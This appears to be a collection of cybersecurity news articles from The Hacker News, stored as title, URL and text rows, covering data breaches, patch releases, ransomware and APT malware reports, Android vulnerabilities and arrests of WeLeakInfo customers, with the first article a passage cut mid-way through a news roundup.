The Massachusetts Institute of Technology (MIT) launches its experimental bug bounty program this week, which aims at encouraging university students and security enthusiasts to find and responsibly report vulnerabilities in its official websites.
""As thanks for helping keep the community safe, we are offering rewards in TechCASH for the responsible disclosure of severe vulnerabilities,"" program website explains.
TechCASH is money that can be used for purchasing goods and services at restaurants and grocery stores around the University Cambridge area.
The MIT becomes the first academic institution to reward hackers, open only for university affiliates with valid certifications, such as undergraduate and graduate students.
4. Never Ending Nanowire Batteries — The Future Of Electronics
Researchers at the University of California at Irvine (UCI) accidentally discovered that batteries build using a Nanowire-based material, a tiny conductor, can be recharged for hundreds of thousands of times.
A typical Lithium-ion battery, used in most smartphones and laptops, expected to have charge cycles between 2000-3000.
However, this innovation could lead to vastly longer lifespans for batteries in smartphones, computers, appliances, cars and spacecraft.
In early testing of the component, this last-longing battery was recharged more than 200,000 times over a three-month span, and no loss of capacity or power was recorded.
5. Edward Snowden Sues Norway to prevent Extradition
Global Surveillance Whistleblower Edward Snowden has filed a lawsuit against the Norwegian government to ensure his travel to Oslo for picking up an award without any risk of being extradited to the United States.
Snowden has been invited to Norway to receive a Freedom of Speech Award from PEN International – the local branch of writers' group – but he is worried that he would be extradited to the United States because of the country's close diplomatic ties with the US.
6. Nearly 93.4 Million Mexican Voter Data Leaked Online
A hacker discovered over 100 gigabytes of an extensive database completely open on the Internet for anyone to download while the hacker was browsing Shodan – a search engine for servers and Internet-connected devices.
The database turned out to be a voter registration database for the country of Mexico that contained the personal information, including full names, residential addresses, and national identification numbers, of virtually all registered voters with 93.4 Million entries.
Taringa: Over 28 Million Users' Data Exposed in Massive Data Breach,https://thehackernews.com/2017/09/taringa-data-breach-hacking.html,"Exclusive — If you have an account on Taringa, also known as ""The Latin American Reddit,"" your account details may have compromised in a massive data breach that leaked login details of almost all of its over 28 million users.
Taringa is a popluar social network geared toward Latin American users, who create and share thousands of posts every day on general interest topics like life hacks, tutorials, recipes, reviews, and art.
The Hacker News has been informed by LeakBase, a breach notification service, who has obtained a copy of the hacked database containing details on 28,722,877 accounts, which includes usernames, email addresses and hashed passwords for Taringa users.
The hashed passwords use an ageing algorithm called MD5 – which has been considered outdated even before 2012 – that can easily be cracked, making Taringa users open to hackers.
Wanna know how weak is MD5?, LeakBase team has already cracked 93.79 percent (nearly 27 Million) of hashed passwords successfully within just a few days.
LeakBase has shared a dump of 4.5 million Taringa users with The Hacker News to help us verify the authenticity of the leaked database.
Using email addresses in the dump, we contacted a few random Taringa users with their plain text passwords, who acknowledged the authenticity of their credentials.
The data breach reportedly occurred last month, and the company then alerted its users via a blog post, sharing more information about the incident.
""It is likely that the attackers have made the database containing nicks, email addresses and encrypted passwords. No phone numbers and access credentials from other social networks have been compromised as well as addresses of bitcoin wallets from the Taringa program! Creators."" the post (translated) says.
""At the moment there is no concrete evidence that the attackers continue to have access to the Taringa code! and our team continues to monitor unusual movements in our infrastructure.""
To protect its users, Taringa is currently sending a password reset link via an email to its users as soon as they access their account with an old password.
One of the contacted users has also shared a screenshot of the notice with The Hacker News, as shown above.
""We've made a massive password reset strategy and also increased the encryption of the passwords from MD5 to SHA256. We've also been in contact with our community via our customer support team,"" a Taringa spokesperson told The Hacker News.
Leaked Database Analysis
Here below we have a brief analysis of the leaked database, which suggests that even after countless warnings, most people are continuously using deadly-simple passwords to safeguard their most sensitive data.
As you can see in the image given below, LeakBase team managed to crack 26,939,351 out of 28,722,877 passwords hashed using the MD5 algorithm, out of which over 15 Million were unique passwords.
The vast majority of the cracked passwords were alpha and lower case alpha and did not contain any special characters or symbols.
Here below we have the list of most popular/common passwords chosen by Taringa users that also includes top worst passwords such as 123456789, 123456, 1234567890, 000000, 12345, and 12345678.
The most popular length of the password was six characters long, followed closely by eight characters, nine and ten characters. Expectedly, the percentages drop drastically as you go higher in length.
Besides the cracked passwords, LeakBase also take a look at the email addresses contained in the leaked data dump, and the most common email domains are as follows:
But, are Taringa users entirely responsible for choosing weak passwords?
Not completely. It's also the fault of the company, who failed to enforce a strong password policy on their users, eventually allowing them to sign up with weak passwords.
After data breaches, the organisations tend to blame the end users for poor password security, but they forget to provide them one.
So far, it has not been clear who is behind the attack on Taringa, neither how the attackers managed to breach into its servers.
Meanwhile, in a separate news,we reported about an unknown hacker selling personal details on more than 6 million high-profile Instagram accounts on an online website, Doxagram, after the hacker breached the Facebook-owned photo sharing service using a flaw in its API.
How to Help Protect Yourself from Data Breaches
Of course, if you are one of those potentially affected users, you are strongly recommended to change your passwords immediately.
Also, change passwords for other online accounts for which you are using the same password as for Taringa account.
Even if any website allows you to create an account with a weak password, you should always choose a complex password. Use a good password manager, if you find following best practices difficult.
Moreover, avoid clicking on any suspicious link or attachment you received via an email and providing your personal or financial information without verifying the source correctly.
Adobe's Year-End Update Patches 87 Flaws in Acrobat Software,https://thehackernews.com/2018/12/adobe-acrobat-update.html,"Adobe is closing out this year with its December Patch Tuesday update to address a massive number of security vulnerabilities for just its two PDF apps—more than double the number of what Microsoft patched this month for its several products.
Adobe today released patches for 87 vulnerabilities affecting its Acrobat and Reader software products for both macOS and Windows operating systems, of which 39 are rated as critical and 48 important in severity.
The security update comes less than a week after Adobe released patches for a critical zero-day vulnerability (CVE-2018-15982) in Flash Player that was actively being exploited in a targeted attack targeting a Russian state health care institution.
The critical vulnerabilities addressed today in Acrobat and Reader include three heap-overflow bugs, five out-of-bounds write flaws, two untrusted pointer dereference issues, two buffer errors, and 24 use-after-free bugs.
Upon successful exploitation, all of the above critical vulnerabilities would allow an attacker to execute arbitrary code on compromised computers.
Rest three critical-rated issues addressed this month are all security bypass issues which, if exploited, would lead to privilege escalation.
In addition to the critical bugs, Adobe patched 48 'important' security flaws in the Acrobat and Reader, including 43 are out-of-bounds read issues, four integer overflow flaws, and two security bypass issues—all of which could lead to information disclosure.
According to the company's support website, vulnerabilities rated as important, ""if exploited would compromise data security, potentially allowing access to confidential data, or could compromise processing resources in a user's computer.""
The company did not disclose technical details of any of the vulnerabilities, but categorized all the flaws, both critical and important, as ""Priority 2,"" meaning that the flaws are unlikely to be exploited in the wild but are at high risk of being exploited.
""There are currently no known exploits. Based on previous experience, we do not anticipate exploits are imminent,"" Adobe says. ""As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days).""
Users of the Adobe Acrobat and Reader apps for Windows and macOS operating systems are highly recommended to update their software packages to the latest versions as soon as possible.
Sophisticated 'TajMahal APT Framework' Remained Undetected for 5 Years,https://thehackernews.com/2019/04/apt-malware-framework.html,"Cybersecurity researchers yesterday unveiled the existence of a highly sophisticated spyware framework that has been in operation for at least last 5 years—but remained undetected until recently.
Dubbed TajMahal by researchers at Kaspersky Lab, the APT framework is a high-tech modular-based malware toolkit that not only supports a vast number of malicious plugins for distinct espionage operations, but also comprises never-before-seen and obscure tricks.
Kaspersky named the framework after Taj Mahal, one of the Seven Wonders of the World located in India, not because it found any connection between the malware and the country, but because the stolen data was transferred to the attackers' C&C server in an XML file named TajMahal.
TajMahal toolkit was first discovered by security researchers late last year when hackers used it to spy on the computers of a diplomatic organization belonging to a Central Asian country whose nationality and location have not been disclosed.
However, malware samples examined by the researchers suggest the cyberespionage group behind the attack has been active since at least August 2014.
The TajMahal framework consists of two main packages—""Tokyo"" and ""Yokohama""—that together contain over 80 distinct malicious modules, which according to researchers, is one of the highest numbers of plugins ever seen for an APT toolset.
""It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim's machine,"" the researchers say.
Researchers have not yet figured out how TajMahal infected its targets at the first place, but they do reveal that once accessed, first stage infection Tokyo is downloaded on targeted machines, which then deliver the fully-functional second-stage malware Yokohama.
Yokohama stores malicious modules in its encrypted Virtual File System which allows the malware to:
log keystrokes,
steal browser cookies and data, including backup for Apple mobile devices,
record and take screenshots of VoIP calls,
steal written CD images,
steal documents sent to the printer queue.
Besides usual spying capabilities, the malware also includes some more unique features like requesting to steal a particular file from a previously plugged in USB stick. So, next time when the USB is connected to the infected computer, the file will be stolen.
Though the researchers found only one TajMahal victim so far but given the framework's sophistication, they believe there are other victims that have yet to be discovered.
""So far we have detected a single victim based on our telemetry,"" Kaspersky said.
""This theory is reinforced by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.""
Additional technical details can be found on the SecureList blog, where the researchers have also published a full set of Indicators of compromise (IOCs) and a complete list of 80 malicious modules stored in the malware with a short description describing what they do.
New Zeppelin Ransomware Targeting Tech and Health Companies,https://thehackernews.com/2019/12/zeppelin-ransomware-attacks.html,"A new variant of Vega ransomware family, dubbed Zeppelin, has recently been spotted in the wild targeting technology and healthcare companies across Europe, the United States, and Canada.
However, if you reside in Russia or some other ex-USSR countries like Ukraine, Belorussia, and Kazakhstan, breathe a sigh of relief, as the ransomware terminates its operations if found itself on machines located in these regions.
It's notable and interesting because all previous variants of the Vega family, also known as VegaLocker, were primarily targeting Russian speaking users, which indicates Zeppelin is not the work of the same hacking group behind the previous attacks.
Since Vega ransomware and its previous variants were offered as a service on underground forums, researchers at BlackBerry Cylance believes either Zeppelin ""ended up in the hands of different threat actors"" or ""redeveloped from bought/stolen/leaked sources.""
According to a report BlackBerry Cylance shared with The Hacker News, Zeppelin is a Delphi-based highly-configurable ransomware that can easily be customized to enable or disable various features, depending upon victims or requirements of attackers.
Zeppelin can be deployed as an EXE, DLL, or wrapped in a PowerShell loader and includes the following features:
IP Logger — to track the IP addresses and location of victims
Startup — to gain persistence
Delete backups — to stop certain services, disable the recovery of files, delete backups and shadow copies, etc.
Task-killer — kill attacker-specified processes
Auto-unlock — to unlock files that appear locked during encryption
Melt — to inject self-deletion thread to notepad.exe
UAC prompt — try running the ransomware with elevated privileges
Based on the configurations attackers set from the Zeppelin builder user-interface during the generation of the ransomware binary, the malware enumerates files on all drives and network shares and encrypts them with the same algorithm as used by the other Vega variants.
""[Zeppelin] employs a standard combination of symmetric file encryption with randomly generated keys for each file (AES-256 in CBC mode), and asymmetric encryption used to protect the session key (using a custom RSA implementation, possibly developed in-house),"" the researchers explain.
""Interestingly, some of the samples will encrypt only the first 0x1000 bytes (4KB), instead of 0x10000 (65KB). It might be either an unintended bug or a conscious choice to speed up the encryption process while rendering most files unusable anyway.""
Besides what features to be enabled and what files to be encrypted, the Zeppelin builder also allows attackers to configure the content of the ransom note text file, which it drops on the system and displays to the victim after encrypting the files.
""BlackBerry Cylance researchers have uncovered several different versions, ranging from short, generic messages to more elaborate ransom notes tailored to individual organizations,"" the researchers say.
""All the messages instruct the victim to contact the attacker via a provided email addresses and quote their personal ID number.""
To evade detection, Zeppelin ransomware relies on multiple layers of obfuscation, including the use of pseudo-random keys, encrypted string, using code of varying sizes, as well as delays in execution to outrun sandboxes and deceive heuristic mechanisms.
Zeppelin was first discovered almost a month ago when it was distributed through water-holed websites with its PowerShell payloads hosted on the Pastebin website.
Researchers believe that at least some of the Zeppelin attacks were ""conducted through MSSPs, which would bear similarities to another recent highly targeted campaign that used ransomware called Sodinokibi,"" also known as Sodin or REvil.
The researchers have also shared indicators of compromise (IoC) in its blog post. At the time of writing, almost 30 percent of antivirus solutions are not able to detect this particular ransomware threat.
"New Android Browser Vulnerability Is a ""Privacy Disaster"" for 70% Of Android Users",https://thehackernews.com/2014/09/new-android-browser-vulnerability-is.html,"A Serious vulnerability has been discovered in the Web browser installed by default on a large number (Approximately 70%) of Android devices, that could allow an attacker to hijack users' open websites, and there is now a Metasploit module available to easily exploit this dangerous flaw.
The exploit targets vulnerability (CVE-2014-6041) in Android versions 4.2.1 and all older versions and was first disclosed right at the start of September by an independent security researcher Rafay Baloch, but there has not been much public discussion on it.
The Android bug has been called a ""privacy disaster"" by Tod Beardsley, a developer for the Metasploit security toolkit, and in order to explain you why, he has promised to post a video that is ""sufficiently shocking.""
""By malforming a javascript: URL handler with a prepended null byte, the AOSP, or Android Open Source Platform (AOSP) Browser) fails to enforce the Same-Origin Policy (SOP) browser security control,"" Tod Beardsley of Rapid7 said in a blog post.
""What this means is any arbitrary website - say, one controlled by a spammer or a spy - can peek into the contents of any other web page,"" Beardsley said. ""[If] you went to an attackers site while you had your webmail open in another window, the attacker could scrape your email data and see what your browser sees.""
""Worse, he could snag a copy of your session cookie and hijack your session completely, and read and write webmail on your behalf.""
Baloch also found the AOSP browser installed on Android 4.2.1 is vulnerable to Same Origin Policy (SOP) bypass that allows one website to steal data from another. He then tested his findings on numerous devices, including Qmobile Noir, Sony Xperia, Samsung Galaxy S3, HTC Wildfire and Motorola Razr and found that it works on all.
But, anyone running the latest release, Android 4.4, is not affected, which means that as many as 75 per cent of Android devices and millions of Android users are vulnerable to the attack, according to Google's own statistics.
Baloch explained that an SOP bypass occurs when one website makes it way to access the properties, such as cookies, location, response etc, of the other site. ""Due to the nature of the issue and potential impact, browsers have very strict model pertaining it and a SOP bypass is rarely found in modern browsers. However, they are found once in a while,"" Baloch said in a blog post.
As a responsible security researcher, Baloch reported the issue to the Google and they responded positively by assuring him that they are working on a ""suitable fix."" But when it came to reward this bug hunter, they replied ""We are unable to reproduce this issue though. Its possible that your OEM has modified the browser in a manner that has created this issue,"" said Josh Armour of Android Security team.
""Android does not currently have a Vulnerability Rewards Program. As far as publicly crediting for the vulnerability we have started to maintain a list of acknowledgements here. Given that this was published before we had a chance to provide patches, this specific report would not qualify.""
The problem is that all the versions except Android 4.4 are affected by this issue and a large number of users still are on the older versions. Worst is the creation of a module for the Metasploit penetration testing platform, which would make the exploitation of the vulnerability much easier.
It all resides in the BROWSER of the Android devices, which can't be uninstalled because it's usually part of the operating system in-build feature. So, in order to protect yourself, just Disable the BROWSER from your Android devices by going to Settings > Apps > All and looking for its icon. By opening it, you'll find a DISABLE button, Select it and disable the Browser.
2012 Most Vulnerable Cities At Risk Of Cyber Crime,https://thehackernews.com/2012/02/2012-most-vulnerable-cities-at-risk-of.html,"2012 Most Vulnerable Cities At Risk Of Cyber Crime
Norton's study showed the city was one of the ten worst for hacking. Each city was ranked by the prevalence of PCs and smartphones in addition to social media use with risk factors like unsecured Wi-Fi hotspots and malware attempts. Manchester was found to be the riskiest city and Vancouver is the third most vulnerable city in Canada for cyber-crime.
The Top 10 Riskiest Online Cities in the U.S. are:
#1 – Washington, D.C.
#2 – Seattle
#3 – San Francisco
#4 – Atlanta
#5 – Boston
#6 – Denver
#7 – Minneapolis
#8 – Sacramento, Calif.
#9 – Raleigh, N.C.
#10 – Austin, Texas
The Top 10 Riskiest Online Cities in Canada are:
#1 - Burlington, ON
#2 - Port Coquitlam, BC
#3 - Vancouver, BC
#4 - Langley, BC
#5 - Calgary, AB
# 6 - Fredericton, NB
#7 - Toronto, ON
#8 - New Westminster, BC
#9 - Edmonton, AB
#10 - Victoria, BC
Cyber crime expert Simon Ellson said there are a numer of steps people can take to stay safe when they are using accessing the web via a smart phone or laptop.Mr Ellson said: ""Never ask your web browser to store your username and password for a website. If you are going to create a password, which you should for any device that you are using, make it unique and change it regularly.Ultimately, make sure you have got some protection on the device you are using. It is a bit like the lock on your front door, if you don't put some kind of preotection on your device, it is like not locking your front door.""
Top 3 Safety Tips from Norton
1. Proceed with caution when using Wi-Fi hotspots
2. Use complex and unique passwords for each site
3. Stay educated
According to Symantec, people who are more connected online are more vulnerable to cyber-criminals. Cyber crime rates cost Canadians $5.5 billion in 2010, according to a study released by Symantec. At least 7.3 million Canadians were victims of cybercrime last year, and there are about 20,000 new victims each day.
Zero-day Smartphone Vulnerability exposes location and User Data,https://thehackernews.com/2012/02/zero-day-smartphone-vulnerability.html,"Zero-day Smartphone Vulnerability exposes location and User Data
Smartphones are increasingly becoming the preferred device for both personal and professional computing, which has also attracted hackers to increase their focus on creating malware and other security vulnerabilities for these devices. A former McAfee researcher ""Dmitri Alperovitch"" has used a previously unknown hole in smartphone browsers to plant China-based malware that can record calls, pinpoint locations and access user texts and emails.
He conducted the experiment on a phone running Android operating system, although he saysApple Inc.'s iPhones are equally vulnerable. Android is particularly vulnerable because it has become the main operating system for mobile devices. Today most smartphones are android-based therefore there is a huge dividend for hackers to write Android-targeted malware compared to other operating systems.
Alperovitch, who has consulted with the U.S. intelligence community, is scheduled to demonstrate his findings Feb. 29 at the RSA conference in San Francisco, an annual cyber security gathering. Alperovitch and his team reversed engineered the malware called Nickispy and and took control of it.
A nice little piece of Android spyware, commonly known as 'NickiSpy.C' . For those unfamiliar, NickiSpy gained quite a bit of notoriety around July/August 2011, as it was one of the first malicious Android applications to have the ability to record phone calls. Alperovitch said he exploited a so-called zero-day vulnerability in smartphone browsers to secretly install the malware. Zero-day vulnerabilities are ones that are not yet known by the manufacturers and anti-virus companies.
The malware also intercepts texts and emails and tracks the phone's location, he said. In theory, it could be used to infiltrate a corporate network with which the phone connects. Like most pieces of Android spyware/malware, installation is dependant on the end-user. In an experiment he also delivered it through a classic ""spear phishing"" attack.
Protect from Malware : For Android, the danger is downloading apps outside of Google's App Market . If you're off somewhere getting apps from sources you don't know or trust, there could be consequences. For iPhone users, the line really is whether you jailbreak or not. Jailbreaking can be pretty easy, and getting pirated or bootlegged apps can seem like a great way to save money, but in doing so, you're basically handing out the smart phone equivalent of a front door key to Lord only knows.
ShadowPad Malware is Becoming a Favorite Choice of Chinese Espionage Groups,https://thehackernews.com/2021/08/shadowpad-malware-is-becoming-favorite.html,"ShadowPad, an infamous Windows backdoor that allows attackers to download further malicious modules or steal data, has been put to use by five different Chinese threat clusters since 2017.
""The adoption of ShadowPad significantly reduces the costs of development and maintenance for threat actors,"" SentinelOne researchers Yi-Jhen Hsieh and Joey Chen said in a detailed overview of the malware, adding ""some threat groups stopped developing their own backdoors after they gained access to ShadowPad.""
The American cybersecurity firm dubbed ShadowPad a ""masterpiece of privately sold malware in Chinese espionage.""
A successor to PlugX and a modular malware platform since 2015, ShadowPad catapulted to widespread attention in the wake of supply chain incidents targeting NetSarang, CCleaner, and ASUS, leading the operators to shift tactics and update their defensive measures with advanced anti-detection and persistence techniques.
More recently, attacks involving ShadowPad have singled out organizations in Hong Kong as well as critical infrastructure in India, Pakistan, and other Central Asian countries. Although primarily attributed to APT41, the implant is known to be shared among several Chinese espionage actors such as Tick, RedEcho, RedFoxtrot, and clusters dubbed Operation Redbonus, Redkanku, and Fishmonger.
""[The threat actor behind Fishmonger is] now using it and another backdoor called Spyder as their primary backdoors for long-term monitoring, while they distribute other first-stage backdoors for initial infections including FunnySwitch, BIOPASS RAT, and Cobalt Strike,"" the researchers said. ""The victims include universities, governments, media sector companies, technology companies and health organizations conducting COVID-19 research in Hong Kong, Taiwan, India and the U.S.""
The malware functions by decrypting and loading a Root plugin in memory, which takes care of loading other embedded modules during runtime, in addition to dynamically deploying supplementary plugins from a remote command-and-control (C2) server, enabling adversaries to incorporate extra functionality not built into the malware by default. At least 22 unique plugins have been identified to date.
The infected machines, for their part, are commandeered by a Delphi-based controller that's used for backdoor communications, updating the C2 infrastructure, and managing the plugins.
Interestingly, the feature set made available to ShadowPad users is not only tightly controlled by its seller, each plugin is sold separately instead of offering a full bundle containing all of the modules, with most samples — out of about 100 — embedded with less than nine plugins.
""The emergence of ShadowPad, a privately sold, well-developed and functional backdoor, offers threat actors a good opportunity to move away from self-developed backdoors,"" the researchers said. ""While it is well-designed and highly likely to be produced by an experienced malware developer, both its functionalities and its anti-forensics capabilities are under active development.""
DocuSign Data Breach Led to Targeted Email Malware Campaign,https://thehackernews.com/2017/05/DocuSign-data-breach.html,"While we all were busy in the WannaCry ransomware menace, two separate data breaches have been reported, one in DocuSign, a major provider of electronic signature technology, and another in BELL, Canada's largest telecommunications company.
In a notice on its website on Tuesday, DocuSign confirmed a breach at one of its email systems when investigating the cause of an increase in DocuSign-impersonating phishing emails.
""A malicious third party had gained temporary access to a separate, non-core system that allows us to communicate service-related announcements to users via email,"" DocuSign said in the announcement.
What Happened?
An unknown hacker or group of hackers managed to breach one of the electronic signature technology provider's email systems and steal a database containing the email addresses of DocuSign customers.
The attackers then used the stolen data to conduct an extensive phishing campaign to target the DocuSign's users over the past week.
The phishing email masqueraded as documents sent from another company with the subject line ""Completed *company name* – Accounting Invoice *number* Document Ready for Signature,"" needing a digital signature from the recipient.
The emails, sent from domains including dse@docus.com, included a downloadable Microsoft Word document, which when clicked, installs ""macro-enabled-malware"" on the victim's computers.
What type of information?
The company said only email addresses of its customers had been accessed in the breach.
However, DocuSign assured its customers that no names, physical addresses, passwords, social security numbers, credit card information or any other information had been accessed by the attackers.
""No content or any customer documents sent through DocuSign's eSignature system was accessed; and DocuSign's core eSignature service, envelopes and customer documents, and data remain secure,"" the company stressed.
How many victims?
The number of victims affected by the phishing campaign has not been confirmed, but DocuSign encourages its customers to use the DocuSign Trust Center to help them protect themselves and their employees from phishing attacks.
""Right now we are still acting on the results of our ongoing investigation and cannot comment on those details,"" the company said.
What is DocuSign doing?
In an attempt to protect its customers, DocuSign has immediately restricted unauthorized access to its system and placed further security controls in place to hardened the security of its systems.
The company is also actively working with law enforcement authorities on the investigation of this matter.
What should DocuSign customers do?
DocuSign recommended its users to delete any email with the following subject line:
Completed: [domain name] – Wire transfer for recipient-name Document Ready for Signature
Completed: [domain name/email address] – Accounting Invoice [Number] Document Ready for Signature.
If you receive any suspicious email, you should forward it to the company's spam address, advised DocuSign.
Also, if the email looks like it has come from DocuSign, just do not respond to that email or click on any link provided in the message.
Instead, access your documents directly by visiting DocuSign official website, and entering the unique security code provided at the bottom of every legit DocuSign email.
The company also informed its users that DocuSign never asks recipients to open any PDF, Office document or ZIP file in an email. Last but not the least, always make sure your antivirus software is up-to-date.
WikiLeaks Won't Disclose CIA Exploits To Companies Until Certain Demands Are Met,https://thehackernews.com/2017/03/wikileaks-cia-hacking-exploits.html,"It's been over a week since Wikileaks promised to hand over more information on hacking tools and tactics of the Central Intelligence Agency (CIA) to the affected tech companies, following a leak of a roughly 8,761 documents that Wikileaks claimed belonged to CIA hacking units.
""We have decided to work with them, to give them some exclusive access to some of the technical details we have, so that fixes can be pushed out,"" WikiLeaks' founder Julian Assange said during a Facebook Live press conference last week.
However, it looks like the things aren't that easier for tech companies as they look.
After days of waiting, Assange made its first contact with Apple, Microsoft, and Google this week and finally made his intentions clear – no sharing of bugs and vulnerabilities the CIA is or was allegedly taking advantage of until certain demands are met.
Multiple anonymous sources familiar with the matter told Motherboard that Assange sent an email to Apple, Google, Microsoft and other companies mentioned in the Vault 7 Leak this week and instead of reporting the bugs and exploits found in the leaked CIA documents, he made some demands.
A document included in the email listed ""a series of conditions"" that the tech companies need to fulfill before gaining access to the actual technical details and code of the hacking tools the anti-secrecy organization has in its possession.
Although the exact conditions are still unclear, one of the sources mentioned a 90-day disclosure deadline, which would require tech companies to issue a patch for the vulnerabilities within a three-month timeframe.
It's also not clear if any of the affected tech companies plan to comply with Wikileaks' demands.
While major tech companies like Apple, Google and Microsoft said that their recent security updates had already fixed the bugs mentioned in Vault 7, they would probably need to check out what WikiLeaks has in its store to ensure proper deployment of patches.
What will happen next is entirely unclear, but since the CIA has had its hacking arsenal public, the best option for the agency is to personally disclose all those loopholes and exploits to the affected companies to keep itself and its citizens safe from hackers as well as foreign government.
""WikiLeaks and the government hold all the cards here, there's not much the tech companies can do on their own besides rabidly looking through their code to look for any issues that might be related,"" one of the anonymous sources said.
Vault 7 is just the beginning of WikiLeaks' Year Zero disclosure, as the group promised to release more from the government and intelligence agencies in coming weeks.
Police Arrest 21 WeLeakInfo Customers Who Bought Breached Personal Data,https://thehackernews.com/2020/12/police-arrest-21-weleakinfo-customers.html,"21 people have been arrested across the UK as part of a nationwide cyber crackdown targeting customers of WeLeakInfo[.]com, a now-defunct online service that had been previously selling access to data hacked from other websites.
The suspects used stolen personal credentials to commit further cyber and fraud offences, the UK National Crime Agency (NCA) said.
Of the 21 arrested — all men aged between 18 and 38 — nine have been detained on suspicion of Computer Misuse Act offences, nine for Fraud offences, and three are under investigation for both. The NCA also seized over £41,000 in bitcoin from the arrested individuals.
Earlier this January, the US Federal Bureau of Investigation (FBI), the NCA, the Netherlands National Police Corps, the German Bundeskriminalamt, and the Police Service of Northern Ireland jointly seized the domain of WeLeakInfo.com.
Launched in 2017, the service provided its users a search engine to access the personal information illegally obtained from over 10,000 data breaches and containing over 12 billion indexed stolen credentials, including, for example, names, email addresses, usernames, phone numbers, and passwords for online accounts.
On top of that, WeLeakInfo offered subscription plans, allowing unlimited searches and access to the results of these data breaches during the subscription period that lasted anywhere from one day ($2), one week ($7), one month ($25), or three months ($70).
The cheap subscriptions made the website accessible to even entry-level, apprentice-type hackers, letting them get hold of a huge cache of data for as little as $2 a day, and in turn, use those stolen passwords to mount credential stuffing attacks.
Following the domain's seizure in January, two 22-year-old men, one in the Netherlands and another in Northern Ireland, were arrested in connection with running the site. WeLeakInfo's Twitter handle has since gone quiet.
The NCA said besides being customers of the website, some of the arrested men had also purchased other cybercrime tools such as remote access Trojans (RATs) and crypters, with three other subjects found to be in possession of indecent images of children.
""Cyber criminals rely on the fact that people duplicate passwords on multiple sites and data breaches create the opportunity for fraudsters to exploit that,"" NCA's Paul Creffield said. ""Password hygiene is therefore extremely important.""
Android iBanking Trojan Source Code Leaked Online,https://thehackernews.com/2014/02/android-ibanking-trojan-source-code-download.html,"Smartphone is the need of everyone today and so the first target of most of the Cyber Criminals. Malware authors are getting to know their market and are changing their way of operations. Since last year we have seen a rise in the number of hackers moving from the Blackhat into the Greyhat.
The Head of knowledge delivery and business development for RSA's FraudAction Group, Daniel Cohen warned users about the new threat via a company blog on Thursday, that explains everything about the malware app, called iBanking.
iBanking, a new mobile banking Trojan app which impersonates itself as an Android 'Security App', in order to deceive its victims, may intimidate a large number of users as now that its source code has been leaked online through an underground forum.
It will give an opportunity to a larger number of cybercriminals to launch attacks using this kind of ready-made mobile malware in the future.
Since many banking sites use two-factor authentication and transaction authorization systems in order to deal with the various threats, by sending unique one-time-use codes to their customers' registered phone numbers via SMS, but in order to defraud them, cyber criminals have started to create various mobile malware like iBanking to solve their purpose.
According to Security Researcher Daniel Cohen, the iBanking mobile bot is a relative all new to the mobile malware arena, and has been available for sale in the Underground Hacking Marketplace [Forum Link] since late last year for $5,000.
""We first saw the iBanking malware was distributed through HTML injection attacks on banking sites, social engineering victims into downloading a so called 'security app' for their Android devices,"" said the RSA researchers in a blog post.
In addition, with the iBanking malware, Computer malware is used to defeat the mobile-based security mechanisms used by the banking sites.
""Apart from the server-side source-code, the leaked files also include a builder that can un-pack the existing iBanking APK file and re-pack it with different configurations, essentially providing fraudsters with the means to create their own unique application,"" added Daniel Cohen.
In addition to SMS Sniffing, the iBanking app allows an attacker to redirect calls to any pre-defined phone number, capture audio using the device's microphone and steal other confidential data like call history log and the phone book contacts.
During the installation process, the malicious app attempts to Social Engineer the user into providing it with administrative rights, making its removal much more difficult.
""The malware is an example of the ongoing developments in the mobile malware space and we are now seeing the next generation of malicious apps being developed and commercialized in the underground, boasting web-based control panels and packing more data-stealing features,"" said Daniel and added that
""The malware's ability to capture SMS messages and audio recordings, as well as divert voice calls makes step-up authentication all the more challenging as fraudsters gain more control over the OOB device. This highlights the need for stronger authentication solutions capable of validating users' identities using multiple factors including biometric solutions.""
These Days, the malware apps are particularly dangerous as they are often designed to look as authentic as possible and one in five mobile threats are now bots, which is a sign that the complexity of Mobile Malware is increasing.
Android Wi-Fi Direct Vulnerability Lets Hackers to Kick your Devices OFF,https://thehackernews.com/2015/01/WiFi-direct-android-hacking.html,"Security researchers from Core Security has reportedly found a Denial of Service (DoS) attack vulnerability in Android WiFi-Direct.
Android's WiFi-Direct is a wireless technology that allows two devices to establish a direct, peer-to-peer Wi-Fi connection without requiring a wireless router. Smartphones have been able to support Wi-Fi Direct for a while now.
According to the advisory, the remotely exploitable denial-of-service vulnerability is affecting a wide number of Android mobile devices when it scans for WiFi Direct devices. If exploited, the vulnerability would let an attacker force a reboot of a device.
""An attacker could send a specially crafted 802.11 Probe Response frame causing the Dalvik subsystem to reboot because of an Unhandle Exception on WiFiMonitor class,"" advisory states.
The Android WiFi-Direct vulnerability (CVE-2014-0997) affects:
Nexus 5 - Android 4.4.4
Nexus 4 - Android 4.4.4
LG D806 - Android 4.2.2
Samsung SM-T310 - Android 4.2.2
Motorola RAZR HD - Android 4.1.2
Wi-Fi Direct works much like Bluetooth, just with a longer range and more stability. Devices like printers and wireless mouses can employ Wi-Fi Direct as a direct connection from the computer. Also, if an object has Wi-Fi capabilities, it could also have Wi-Fi Direct, which could allow you to control it with your smartphone in near future.
Andres Blanco from the CoreLabs Team reported the vulnerability to Android Security team and Google classified its as low severity, and they are not much interested to release any patch quickly.
IT Giant Accenture Hit by LockBit Ransomware; Hackers Threaten to Leak Data,https://thehackernews.com/2021/08/it-giant-accenture-hit-by-lockbit.html,"Global IT consultancy giant Accenture has become the latest company to be hit by the LockBit ransomware gang, according to a post made by the operators on their dark web portal, likely filling a void left in the wake of DarkSide and REvil shutdown.
""These people are beyond privacy and security. I really hope that their services are better than what I saw as an insider,"" read a message posted on the data leak website. Accenture said it has since restored the affected systems from backups.
LockBit, like its now-defunct DarkSide and REvil counterparts, operates using a ransomware-as-a-service (RaaS) model, roping in other cybercriminals (aka affiliates) to carry out the intrusion using its platform, with the payments often divided between the criminal entity directing the attack and the core developers of the malware.
The ransomware group emerged on the threat landscape in September 2019, and in June 2021 launched LockBit 2.0 along with an advertising campaign to recruit new partners. ""LockBit also claims to offer the fastest data exfiltration on the market through StealBit, a data theft tool that can allegedly download 100 GB of data from compromised systems in under 20 minutes,"" Emsisoft noted in a profile of the crime syndicate.
Some of LockBit's past victims include the Press Trust of India and Merseyrail.
The development comes as ransomware incidents have become a critical threat to national and economic security that have left businesses scrambling to pay hefty extortion demands.
